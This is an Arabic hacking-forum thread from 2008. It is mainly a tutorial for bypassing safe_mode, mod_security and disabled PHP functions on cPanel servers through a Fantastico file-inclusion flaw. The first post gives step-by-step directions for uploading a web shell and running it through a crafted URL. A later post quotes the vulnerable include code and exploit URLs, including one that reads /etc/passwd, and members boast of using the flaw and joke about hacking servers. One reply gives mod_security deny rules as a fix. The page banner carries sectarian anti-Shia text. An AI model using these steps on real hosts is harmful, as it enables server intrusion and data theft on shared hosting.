عالم المعرفة - Group XP - أهل السنه والجماعه
ضع إعلانك هنا الحوار السني الشيعي تعــــلم تشفير الباتش تشفير السيرفر فك التشفير تشفير الملفات Crypter ضع إعلانك هنا
مسابقه تشفير السيرفرات المقدم Hack.VB.NET ضع إعلانك هنا ضع إعلانك هنا ضع إعلانك هنا

فضائح الخميني ، فضائح الشيرازي ، فضائح الخوئي ، فضائح السيستاني ، فضائح حسن نصر الله ، فضائح مقتدى الصدر ، فضائح المذهب الشيعي ، فضائح الشيعة ، فضائح الرافضة ، فضائح الروافض , افلام , وصور , جرائم المجوس ضدأهل السنه , ومقالات , وتصريحات إعلامية

 
العودة   عالم المعرفة - Group XP - أهل السنه والجماعه > قسم حماية الاجهزة والسيرفرات > أمن المواقع والسيرفرات
تحديث الصفحة [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version 11
تفعيل العضوية استعادة كلمة المرور البحث مشاركات اليوم اجعل كافة الأقسام مقروءة

أمن المواقع والسيرفرات اختراق المواقع , اختراق المنتديات , برنامج اختراق , اختراق السيرفرات , ادوات اختراق , برامج اختراق , تعليم اختراق , شروحات اختراق , دورات اختراق , شل , shell , اخراق سيرفر وندز

إضافة رد
صفحة 1 من 2 1 2
 
LinkBack أدوات الموضوع
قديم 09-16-2008, 10:27 PM   رقم المشاركة : 1 (permalink)
joker_1
عضو مميز






joker_1 غير متصل

joker_1 will become famous soon enoughjoker_1 will become famous soon enough

m3ic5 [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version 11

[CENTER][B]السلام عليكم شباب

قلت انزل الشرح دا ومعة فيديو مسوية من 3 شهور



مثل ما عودناكم بكل جديد ومثير

اليوم بدنا نكهرب شوية سيرفرات بثغرة تخطي برايفت خاااااااااااااااااص

الصراحة طولت عندنا وقلنا نخلي الشباب يستفيدوا

ندخل علي الشرح

كثير منكم عندة سي بانلات نقدر نقول عقيمة وما تمشي عليها ثغرات تخطي ولا حركات
هتكسس كورن جوب ولا بيرل ولا بايثون ولا تغيير اصدار ولا شي
يبقي يلزمنا ثغرة برااايفت قوية عشان نتخطي ونخلي الحماية مثل ما جات من الشركة
اولا

ندخل السي بانيل عادي جدا

ونشوف هل يوجد فانتسيكو او لا



ثاني شي ندخل علي مجلد اليوزر

/home/user

ونقوم بانشاء مجلد باسم

includes



وبعدها نجيب اي شيل ونسمية

enc_licensing_servers.php

ونرفعة عادي جوة فولدر الانكلودس



يعني مسارة راح يكون كدا

/home/user/includes/enc_licensing_servers.php


بعديها نرجع للسي بانيل عادي ونحط مسارنا كدا

http://xxx::2082/frontend/x/fantasti...ath=/home/user



والنتيجة حيفتح وياك الشيل وحتي لو الدومين مو شغال

وبدون سيف مود شغال

وبدون مود يسكيورتي يخنقك

وبدون دوال

الحماية = 0

اخيرا شرح فيديو للي ما فهم الشرح فوق


الفيديو قديم شوية بس راح تفهمو منة كل شي


http://www.freewebtown.com/alm3refh98/xxx.zip

او


هنا


Special Greetings :- hosam & sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star & sudani_hacker

وكل حبايبي بالماسنجر

انا حقوقي محفوظة

الرجاء حفظ حقوق الموقع عند النقل


باسورد فك الضغط sniper-sa

تحياتي

اخوكم الجوكر







آخر تعديل XP يوم 10-17-2008 في 05:17 AM.
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-16-2008, 11:04 PM   رقم المشاركة : 2 (permalink)
joker_1
عضو مميز






joker_1 غير متصل

joker_1 will become famous soon enoughjoker_1 will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

والترقيع لاصحاب المواقع عندك كم خيار

ترقية السي بانيل

http://www.alm3refh.com/vb/t10297.html (شرح تحديث السي بنل)


او اضافة رولز بسيط للمود

SecFilterSelective REQUEST_URI "xml.php\?fantasticopath=" deny,log

SecFilterSelective REQUEST_URI "xml\.php\?" deny,log



وطبعا تقدر تسمح الفانتسيكو كلة لو تحب



تحياتي
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-16-2008, 11:16 PM   رقم المشاركة : 3 (permalink)
Qtr Linux
عضو شرف
 
الصورة الرمزية Qtr Linux







Qtr Linux غير متصل

Qtr Linux will become famous soon enoughQtr Linux will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

ابداع X ابداع


لكن

ابي اقول كلمة ومدري لو بتزعل


به واحد ايضاَ مسوي نفس الشرحة
اسمه " سنايبر كود "

حاطه بترياق


يقول ان محد مكتشف الثغرة ,, واحد مجهول اكتشفها
ويقولون انه يمكن واحد


وواحد يقول انك انسبت الثغرة لك


والله انا مدري لكن ,, حبيت اقول لك ان فيه ضجة كبيرة ورا هذي الحركة



وبعطيك رابط الموضوع على الخاص
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-16-2008, 11:35 PM   رقم المشاركة : 4 (permalink)
joker_1
عضو مميز






joker_1 غير متصل

joker_1 will become famous soon enoughjoker_1 will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

هلا اخوي قطر لينيكس

http://www.milw0rm.com/exploits/6461


اما عن الاخ الي بترياق

فعادي يخوي ماهي اول مرة واحد من ترياق يلاقي ثغرة جديدة ولا تخطي جديد نازل
يقول اللله كانت عندي بس نسيت انزلها

او مسروقة مني

بعدين تقدر تسال xp من امتي معانا الثغرة هاي ومن امتي نستعملها

علي الاقل 5 شهور

تحياتي
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-17-2008, 02:00 AM   رقم المشاركة : 5 (permalink)
Dr.the bright boy
بانــد







Dr.the bright boy غير متصل

Dr.the bright boy will become famous soon enoughDr.the bright boy will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

اقتباس:
مثل ما عودناكم بكل جديد ومثير

اليوم بدنا نكهرب شوية سيرفرات بثغرة تخطي برايفت خاااااااااااااااااص

الصراحة طولت عندنا وقلنا نخلي الشباب يستفيدوا
0day هذه ما يحتاج ...

والله لها معاي فترة طويلة .. اللي مكتشفها من زمان عضو من ترياق زميل لي وأرسلها لي لكي أستثمرها ...


لكن كسل مني ووإنشغال ... وإصاباتها قليله

لكن ان كنت اكتشفتها بنفسك فهذا شي رائع جدااا ...

وعندي حركة أخليك تنجن حركة أسمها PHP poison أخليها الثغرة تعطيك شل اكاونت

اقتباس:
به واحد ايضاَ مسوي نفس الشرحة
اسمه " سنايبر كود "

حاطه بترياق


يقول ان محد مكتشف الثغرة ,, واحد مجهول اكتشفها
ويقولون انه يمكن واحد


وواحد يقول انك انسبت الثغرة لك


والله انا مدري لكن ,, حبيت اقول لك ان فيه ضجة كبيرة ورا هذي الحركة



وبعطيك رابط الموضوع على الخاص
في ثغرة بالـ كيرنل 2.6 0day مشهورة استثمرتها بنفسي ولعبت بالدنيا فيها ... طلع مكتشفها الحقيقي هكر ايطالي من فتره ... أنجنيت ( كيف وصل لها )
الامر طبيعي كل ما تتقدم بالهاك كل ما تفهم وتستوعب كل شي على حسب خلفيتك البرمجية
لكن
البعض ما يعرف يبرمج بي اتش بي لكن تلقاه يكتشف ثغرات عد واغلط ( سر المهنه)

نعود ...

المكتشف لها الثغرة الحقيقي معروف ولا ابي اذكر ذلك من أجل لا يكون هناك بعض الاشكاليات .... لكن بما أنه بدأ اكتشاف ثغرات PHP سهل

فتوقع انه ثغرات 0day تكون منتشره بين قروب معين .. وانت بالاصل مكتشفها من زمان

بالنسبه لسنايبر كود عضو في منتديات عدة وهو اشوفه في المعرفه و عرب سيرفس وغيرها

إن كان اجتهاد منه فهذا رائع جدا

اقتباس:
هلا اخوي قطر لينيكس

http://www.milw0rm.com/exploits/6461


اما عن الاخ الي بترياق

فعادي يخوي ماهي اول مرة واحد من ترياق يلاقي ثغرة جديدة ولا تخطي جديد نازل
يقول اللله كانت عندي بس نسيت انزلها

او مسروقة مني

بعدين تقدر تسال xp من امتي معانا الثغرة هاي ومن امتي نستعملها

علي الاقل 5 شهور

تحياتي
جوكر انت لا خلا ولا عدم ... انا شفت امس الثغرة بموقع سكيورتي شهير وقلت في نفسي

طار 0day أخيرا هههههههههه


الامر طبيعي بما انه بدأت الناس تفهم بالبي اتش بي في يوم واحد تحصل واحد اكتشف ثغرة واستثمرها انا اجي مثلا فاهم بالبي اتش بي واطلع ثغرات اكثر وهذا يحصل كثيرا في مواقع السكيورتي


أخيرا

رائع يا جوكر وننتظر 0day أخر

أخوك الفقير إلى الله

أسد المخترقين






آخر تعديل Dr.the bright boy يوم 09-17-2008 في 03:24 AM.
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-17-2008, 05:23 AM   رقم المشاركة : 6 (permalink)
هبووب الشمال
عضو جديد






هبووب الشمال غير متصل

هبووب الشمال will become famous soon enoughهبووب الشمال will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

قووآك الله اخوي على الأكتشاافات

وفيه ثغرات كثيره برايفت يقوول انا مكتشف وفيه وأحد ثاني مكتشف بس من اللي ينزلها اول وأحد

وبالتوفيق للجميع
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-17-2008, 09:45 PM   رقم المشاركة : 7 (permalink)
sarab99
عضو جديد






sarab99 غير متصل

sarab99 will become famous soon enoughsarab99 will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

ذيب ياحوكر انت اللي مكتشف الثغره 100%

لانك انت اول من وضعها واللي يقول انه مكتشفها ولكن محتفظ فيها لنفسه هذي مشكلته هو.
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-17-2008, 11:00 PM   رقم المشاركة : 8 (permalink)
Dr.the bright boy
بانــد







Dr.the bright boy غير متصل

Dr.the bright boy will become famous soon enoughDr.the bright boy will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

نعود من جديد ...

نزل أخواني 020 & cyb3rt نفس فكرة الثغرة بالظبط بس فيه إختلاف قبل تقريبا ثمانية أشهر على

كود:
cPanel 10.x.x  (Fantastico)


كود:

Vulnerable Code ( 1  ) :
 if(is_file($userlanguage))
   {
       include ( $userlanguage );
الإستثمار

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

http://xx.com:2082/frontend/x/fantas...ge=/etc/passwd



الثغرة الثانية

http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php


كود:
$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
       {
       include($localmysqlconfig);

http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



المصدر

http://packetstormsecurity.org/0703-...astico-lfi.txt
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-18-2008, 12:01 AM   رقم المشاركة : 9 (permalink)
Dra Alsunna

" Group XP "
 
الصورة الرمزية Dra Alsunna







Dra Alsunna غير متصل

Dra Alsunna will become famous soon enoughDra Alsunna will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

تسسسسسسسسسسلم خلني ارفع شل ثم اخترق سيرفر ههههههههههههههههههههههههههههههههههه







التوقيع

حسبي الله , لا إله إلا هو عليه توكلت وهو رب العرش العظيم
من قالها 7 مرات في المساء و 7 مرات في الصباح كفاه الله همه
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-18-2008, 01:29 AM   رقم المشاركة : 10 (permalink)
Dr.the bright boy
بانــد







Dr.the bright boy غير متصل

Dr.the bright boy will become famous soon enoughDr.the bright boy will become famous soon enough

افتراضي رد: [Priv8] تخطي الدوال و mod_security و Safe_Mode بثغرة Fantastico Cpanel Version

اقتباس:
قووآك الله اخوي على الأكتشاافات

وفيه ثغرات كثيره برايفت يقوول انا مكتشف وفيه وأحد ثاني مكتشف بس من اللي ينزلها اول وأحد

وبالتوفيق للجميع

كلامك صحيح لكن ها الثغرة سببت إشكاليات عدة ... كثير من ينتسبها لنفسه ..
والبعض ينتقد والبعض ... البعض يقول لماذا الجوكر انتسبها لنفسه

لكن المفترض ( وجهة نظري ) الجوكر ما نزلها مره لانه بها الثغرة بتسبب اشكاليات كثير ..

المشكله مشكلتنا جميعا الهكرز العرب ( متفككين ) حتى ثغرة لم نعرف من هو صاحبها الحقيقي

الله يجمعنا أمين
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
إضافة رد
صفحة 1 من 2 1 2

الكلمات الدلالية (Tags)
جوال, شرح, poison, version, فيديو

« الموضوع السابق | الموضوع التالي »

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


الساعة الآن 11:58 PM.


روابط مهمة

أقسام المنتدى

الاتصال بنا - السنه - الأرشيف - الأعلى

Powered by vBulletin Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة